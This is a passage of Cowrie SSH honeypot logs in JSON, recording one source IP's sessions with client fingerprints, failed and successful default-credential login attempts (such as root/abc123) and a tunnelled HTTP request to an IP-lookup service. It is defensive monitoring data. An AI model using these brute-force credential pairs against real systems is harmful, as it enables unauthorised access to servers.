-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:45.885812Z","src_ip":"212.227.235.229","session":"2670ba7a5096"}
{"eventid":"cowrie.login.failed","username":"vyos","password":"vyos","message":"login attempt [vyos/vyos] failed","sensor":"my-vps","timestamp":"2025-08-28T08:06:51.876187Z","src_ip":"212.227.235.229","session":"2670ba7a5096"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:06:53.247267Z","src_ip":"212.227.235.229","session":"2670ba7a5096"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58622,"dst_ip":"1.2.3.4","dst_port":22,"session":"811f59ec5b51","protocol":"ssh","message":"New connection: 212.227.235.229:58622 (1.2.3.4:22) [session: 811f59ec5b51]","sensor":"my-vps","timestamp":"2025-08-28T08:06:59.570035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:59.690768Z","src_ip":"212.227.235.229","session":"811f59ec5b51"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:59.870708Z","src_ip":"212.227.235.229","session":"811f59ec5b51"}
{"eventid":"cowrie.login.failed","username":"open","password":"open","message":"login attempt [open/open] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:01.209857Z","src_ip":"212.227.235.229","session":"811f59ec5b51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51018,"dst_ip":"1.2.3.4","dst_port":22,"session":"361081b258ef","protocol":"ssh","message":"New connection: 212.227.235.229:51018 (1.2.3.4:22) [session: 361081b258ef]","sensor":"my-vps","timestamp":"2025-08-28T08:07:01.749115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:01.752703Z","src_ip":"212.227.235.229","session":"361081b258ef"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:02.016816Z","src_ip":"212.227.235.229","session":"361081b258ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51028,"dst_ip":"1.2.3.4","dst_port":22,"session":"7632febc95af","protocol":"ssh","message":"New connection: 212.227.235.229:51028 (1.2.3.4:22) [session: 7632febc95af]","sensor":"my-vps","timestamp":"2025-08-28T08:07:04.136209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:04.139779Z","src_ip":"212.227.235.229","session":"7632febc95af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58642,"dst_ip":"1.2.3.4","dst_port":22,"session":"490fcfd1a2d0","protocol":"ssh","message":"New connection: 212.227.235.229:58642 (1.2.3.4:22) [session: 490fcfd1a2d0]","sensor":"my-vps","timestamp":"2025-08-28T08:07:04.279695Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:04.412111Z","src_ip":"212.227.235.229","session":"7632febc95af"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:04.415592Z","src_ip":"212.227.235.229","session":"490fcfd1a2d0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:04.559733Z","src_ip":"212.227.235.229","session":"490fcfd1a2d0"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:05.102327Z","src_ip":"212.227.235.229","session":"361081b258ef"}
{"eventid":"cowrie.login.failed","username":"library","password":"library","message":"login attempt [library/library] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:05.680462Z","src_ip":"212.227.235.229","session":"490fcfd1a2d0"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:07:06.507745Z","src_ip":"212.227.235.229","session":"7632febc95af"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:06.683064Z","src_ip":"212.227.235.229","session":"361081b258ef"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:06.799263Z","src_ip":"212.227.235.229","session":"811f59ec5b51"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:07:06.945879Z","session":"7632febc95af"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:06.960925Z","src_ip":"212.227.235.229","session":"490fcfd1a2d0"}
{"eventid":"cowrie.login.failed","username":"joro","password":"joro","message":"login attempt [joro/joro] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:07.029796Z","src_ip":"212.227.235.229","session":"7fe41cc61a52"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:07:07.207014Z","src_ip":"212.227.235.229","session":"7632febc95af"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:07.468274Z","src_ip":"212.227.235.229","session":"7632febc95af"}
{"eventid":"cowrie.session.closed","duration":"99.7","message":"Connection lost after 99.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:08.346027Z","src_ip":"212.227.235.229","session":"7fe41cc61a52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48746,"dst_ip":"1.2.3.4","dst_port":22,"session":"99e2631a4a99","protocol":"ssh","message":"New connection: 212.227.235.229:48746 (1.2.3.4:22) [session: 99e2631a4a99]","sensor":"my-vps","timestamp":"2025-08-28T08:07:12.727457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:12.729138Z","src_ip":"212.227.235.229","session":"99e2631a4a99"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:07:12.998815Z","src_ip":"212.227.235.229","session":"99e2631a4a99"}
{"eventid":"cowrie.login.failed","username":"kelly","password":"kelly","message":"login attempt [kelly/kelly] failed","sensor":"my-vps","timestamp":"2025-08-28T08:07:14.416968Z","src_ip":"212.227.235.229","session":"99e2631a4a99"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:07:16.123101Z","src_ip":"212.227.235.229","session":"99e2631a4a99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39044,"dst_ip":"1.2.3.4","dst_port":22,"session":"a68d7c358985","protocol":"ssh","message":"New connection: 212.227.235.229:39044 (1.2.3.4:22) [session: a68d7c358985]","sensor":"my-vps","timestamp":"2025-08-28T08:07:19.800140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:07:19.801931Z","src_ip":"212.227.235.229","session":"a68d7c358985"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm